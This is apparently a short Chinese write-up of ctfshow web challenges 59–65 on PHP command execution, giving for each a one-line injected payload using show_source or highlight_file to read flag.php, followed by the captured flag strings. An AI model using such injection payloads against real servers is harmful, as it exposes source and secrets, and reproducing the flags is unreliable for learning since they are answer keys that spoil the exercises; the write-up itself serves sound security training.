ctfshow-web入门-命令执行（web59-web65）

目录

1、web59

2、web60

3、web61

4、web62

5、web63

6、web64

7、web65

---

都是使用 highlight_file 或者 show_source

 

1、web59

直接用上一题的 payload：

c=show_source('flag.php');

拿到 flag：ctfshow{9e058a62-f37d-425e-9696-43387b0b3629}

2、web60

过滤更多

还是使用 show_source()

c=show_source("flag.php");

拿到 flag：ctfshow{b275a543-cc93-4454-add2-c5f1826ddaca}

3、web61

这里 copy 、rename 也禁用了

还是使用高亮显示源码的函数 

c=show_source("flag.php");

拿到 flag：ctfshow{905ea953-3623-4eb7-b3e3-5618db3b4cf7}

4、web62

还是用上一题的 payload：

c=show_source("flag.php");

拿到 flag：ctfshow{28bfa41b-3dad-4eef-a12e-cd88d644f620}

5、web63

c=highlight_file("flag.php");

ctfshow{745aa683-6a56-4793-a8d3-390249d6fc70}

6、web64

c=highlight_file("flag.php");

ctfshow{42817ff2-d650-430a-84e2-30b793c921b4}

7、web65

c=highlight_file("flag.php");

ctfshow{48c4f136-5c87-426b-812b-156a20870c11}